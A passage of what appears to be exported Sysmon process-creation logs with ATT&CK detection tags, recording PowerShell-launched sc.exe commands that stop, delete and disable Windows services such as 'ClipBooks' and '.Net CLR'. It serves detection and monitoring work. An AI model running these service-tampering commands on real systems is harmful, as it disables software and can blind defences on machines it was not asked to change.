14:19:00.990",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.344 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010a97e2100} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.346595600Z"",""eventRecordID"":""2782"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.344\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010a97e2100}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.344"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010a97e2100}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.901",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.279 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010107c2100} +ProcessId: 3668 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.284573100Z"",""eventRecordID"":""2779"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.279\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010107c2100}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.279"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010107c2100}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.858",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.252 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010667a2100} +ProcessId: 7592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.255525100Z"",""eventRecordID"":""2777"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.252\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010667a2100}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.252"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010667a2100}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.848",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.236 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-001087792100} +ProcessId: 2084 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.239538300Z"",""eventRecordID"":""2776"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.236\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-001087792100}\r\nProcessId: 2084\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.236"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-001087792100}"",""processId"":""2084"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.801",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.202 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-0010fb762100} +ProcessId: 7136 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WissssssnHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.204192300Z"",""eventRecordID"":""2773"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.202\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-0010fb762100}\r\nProcessId: 7136\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WissssssnHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.202"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-0010fb762100}"",""processId"":""7136"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WissssssnHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.697",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.163 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-00106d742100} +ProcessId: 4128 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop "".Net CLR"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:30.165569000Z"",""eventRecordID"":""2770"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:30.163\r\nProcessGuid: {df9fc3d3-b396-5ecf-0000-00106d742100}\r\nProcessId: 4128\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \"".Net CLR\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:30.163"",""processGuid"":""{df9fc3d3-b396-5ecf-0000-00106d742100}"",""processId"":""4128"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\"".Net CLR\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:00.675",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:30.151 +ProcessGuid: {df9fc3d3-b396-5ecf-0000-001097732100} +ProcessId: 2872 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config "".Net CLR"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 